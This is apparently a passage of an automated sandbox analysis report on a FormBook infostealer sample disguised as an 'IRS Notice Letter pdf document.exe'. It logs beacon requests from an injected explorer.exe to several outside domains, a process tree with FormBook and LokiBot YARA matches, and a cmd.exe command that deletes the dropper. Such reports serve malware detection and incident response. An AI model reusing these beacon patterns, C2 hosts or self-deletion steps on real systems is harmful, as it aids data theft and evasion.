                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          6192.168.2.449737147.255.30.9480C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 11, 2021 16:25:14.508002996 CET373OUTGET /09rb/?Jt78=fd7Pr27tD73tirRUHLPhwKiuhRBsBtIJKGnPU16/EYze1BREDS5LbMsrasNXGEl7bB1Y&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.aksaystudios.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 11, 2021 16:25:14.700244904 CET373INHTTP/1.1 200 OK
                                                                          Transfer-Encoding: chunked
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Server: Nginx Microsoft-HTTPAPI/2.0
                                                                          X-Powered-By: Nginx
                                                                          Date: Mon, 11 Jan 2021 15:25:09 GMT
                                                                          Connection: close
                                                                          Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                          Data Ascii: 3


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          7192.168.2.449738153.126.209.13680C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 11, 2021 16:25:20.495930910 CET379OUTGET /09rb/?Jt78=nAgyAFuV8j6ec0qd9dJQyz40Go8ypkE1WIwLRMRPEn1ZOiBWoUM4woT6qKfb9Xt5A1xV&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.aizimov.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 11, 2021 16:25:20.805578947 CET380INHTTP/1.1 301 Moved Permanently
                                                                          Date: Mon, 11 Jan 2021 15:25:20 GMT
                                                                          Server: Apache
                                                                          Location: http://www.aizimov.com/?Jt78=nAgyAFuV8j6ec0qd9dJQyz40Go8ypkE1WIwLRMRPEn1ZOiBWoUM4woT6qKfb9Xt5A1xV&pN9=EXX8_N6xKpqxS
                                                                          Content-Length: 327
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 69 7a 69 6d 6f 76 2e 63 6f 6d 2f 3f 4a 74 37 38 3d 6e 41 67 79 41 46 75 56 38 6a 36 65 63 30 71 64 39 64 4a 51 79 7a 34 30 47 6f 38 79 70 6b 45 31 57 49 77 4c 52 4d 52 50 45 6e 31 5a 4f 69 42 57 6f 55 4d 34 77 6f 54 36 71 4b 66 62 39 58 74 35 41 31 78 56 26 61 6d 70 3b 70 4e 39 3d 45 58 58 38 5f 4e 36 78 4b 70 71 78 53 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.aizimov.com/?Jt78=nAgyAFuV8j6ec0qd9dJQyz40Go8ypkE1WIwLRMRPEn1ZOiBWoUM4woT6qKfb9Xt5A1xV&amp;pN9=EXX8_N6xKpqxS">here</a>.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          8192.168.2.449739216.58.207.17980C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 11, 2021 16:25:25.984777927 CET381OUTGET /09rb/?Jt78=tK5SHJ/B9VkSEfSQE3soaE4uMhY2LrE6ZvvxVQcBFq9KYH6DfuOZHLVl1n1LVl7A3A7r&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.thebuzztraders.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 11, 2021 16:25:26.202717066 CET382INHTTP/1.1 200 OK
                                                                          Content-Type: text/html; charset=utf-8
                                                                          X-Cloud-Trace-Context: 87cd339222732a8cf9a37e24eab38309;o=1
                                                                          Date: Mon, 11 Jan 2021 15:25:26 GMT
                                                                          Server: Google Frontend
                                                                          Content-Length: 2677
                                                                          Connection: close
                                                                          Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 0a 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 63 6b 70 61 74 68 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 34 2e 35 2e 32 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 4a 63 4b 62 38 71 33 69 71 4a 36 31 67 4e 56 39 4b 47 62 38 74 68 53 73 4e 6a 70 53 4c 30 6e 38 50 41 52 6e 39 48 75 5a 4f 6e 49 78 4e 30 68 6f 50 2b 56 6d 6d 44 47 4d 4e 35 74 39 55 4a 30 5a 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2e 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 42 75 7a 7a 20 54 72 61 64 65 72 73 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 20 69 64 3d 22 65 6d 61 69 6c 4c 69 73 74 42 6f 64 79 22 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 65 6d 61 69 6c 4c 69 73 74 43 6f 6e 74 61 69 6e 65 72 22 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 31 32 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 67 2f 54 68 65 42 75 7a 7a 54 72 61 64 65 72 73 2e 70 6e 67 22 20 68 65 69 67 68 74 3d 22 32 33 30 70 78 22 20 77 69 64 74 68 3d 22 32 33 30 70 78 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 73 6c 6f 67 61 6e 22 3e 49 4e 56 45 53 54 20 49 4e 20 59 4f 55 52 20 54 4f 4d 4f 52 52 4f 57 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 35 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 70 61 67 65 44 65 73 63 72 69 70 22 3e 53 69 67 6e 20 75 70 20 66 6f 72 20 6f 75 72 20 6e 65 77 73 6c 65 74 74 65 72 3c 2f 68 35 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 66 6f 72 6d 44 69 76 22 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 61 63 74 69 6f 6e 3d 22 69 6e 73 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 65 6d 61 69 6c 22 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 31 32 22 20 69 64 3d 22 65 6d 61 69 6c 4c 61 62 65 6c 22 3e 45 6d 61 69 6c 3a 3c 2f 6c 61 62 65 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 65 6d 61 69 6c 22 20 72 65 71 75 69 72 65 64 20 69 64 3d 22 65 6d 61 69 6c 22 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous"> <link rel="stylesheet" type="text/css" href="./css/main.css"> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>The Buzz Traders</title></head> <body id="emailListBody" class="text-center"> <div id="emailListContainer" class="col-12 text-center"> <img src="./img/TheBuzzTraders.png" height="230px" width="230px"> <h1 class="text-center" id="slogan">INVEST IN YOUR TOMORROW</h1> <h5 class="text-center" id="pageDescrip">Sign up for our newsletter</h5> <div id="formDiv" class="text-center"> <form method="POST" action="insert"> <label for="email" class="col-12" id="emailLabel">Email:</label> <input type="email" required id="email" name="email">


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          9192.168.2.44974034.102.136.18080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 11, 2021 16:25:36.761926889 CET385OUTGET /09rb/?Jt78=boggCF0+VtvWGkPjuCU1AaxF3fKHqCWZ16CI7xOuJOi/WrjAR/MJUlDlafE5AdeUJQBT&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.emuprising.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 11, 2021 16:25:36.900512934 CET385INHTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Mon, 11 Jan 2021 15:25:36 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "5fd4972f-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Code Manipulations

                                                                          Statistics

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          Analysis Process: IRS Notice Letter pdf document.exe PID: 6092 Parent PID: 6024

                                                                          General

                                                                          Start time:16:22:46
                                                                          Start date:11/01/2021
                                                                          Path:C:\Users\user\Desktop\IRS Notice Letter pdf document.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
                                                                          Imagebase:0x400000
                                                                          File size:106496 bytes
                                                                          MD5 hash:3FC4D64F320D7FAE4BB46F6A735AB853
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Visual Basic
                                                                          Reputation:low

                                                                          Analysis Process: IRS Notice Letter pdf document.exe PID: 3788 Parent PID: 6092

                                                                          General

                                                                          Start time:16:23:05
                                                                          Start date:11/01/2021
                                                                          Path:C:\Users\user\Desktop\IRS Notice Letter pdf document.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
                                                                          Imagebase:0x400000
                                                                          File size:106496 bytes
                                                                          MD5 hash:3FC4D64F320D7FAE4BB46F6A735AB853
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          Analysis Process: explorer.exe PID: 3424 Parent PID: 3788

                                                                          General

                                                                          Start time:16:23:16
                                                                          Start date:11/01/2021
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:
                                                                          Imagebase:0x7ff6fee60000
                                                                          File size:3933184 bytes
                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Analysis Process: cmstp.exe PID: 2860 Parent PID: 3424

                                                                          General

                                                                          Start time:16:23:29
                                                                          Start date:11/01/2021
                                                                          Path:C:\Windows\SysWOW64\cmstp.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                                          Imagebase:0xca0000
                                                                          File size:82944 bytes
                                                                          MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000003.00000002.1022334778.0000000005467000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000003.00000002.1021594863.000000000322D000.00000004.00000020.sdmp, Author: Florian Roth
                                                                          Reputation:moderate

                                                                          Analysis Process: cmd.exe PID: 4972 Parent PID: 2860

                                                                          General

                                                                          Start time:16:23:33
                                                                          Start date:11/01/2021
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:/c del 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
                                                                          Imagebase:0x11d0000
                                                                          File size:232960 bytes
                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Analysis Process: conhost.exe PID: 5700 Parent PID: 4972

                                                                          General

                                                                          Start time:16:23:34
                                                                          Start date:11/01/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff724c50000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Disassembly

                                                                          Code Analysis

                                                                          Reset < >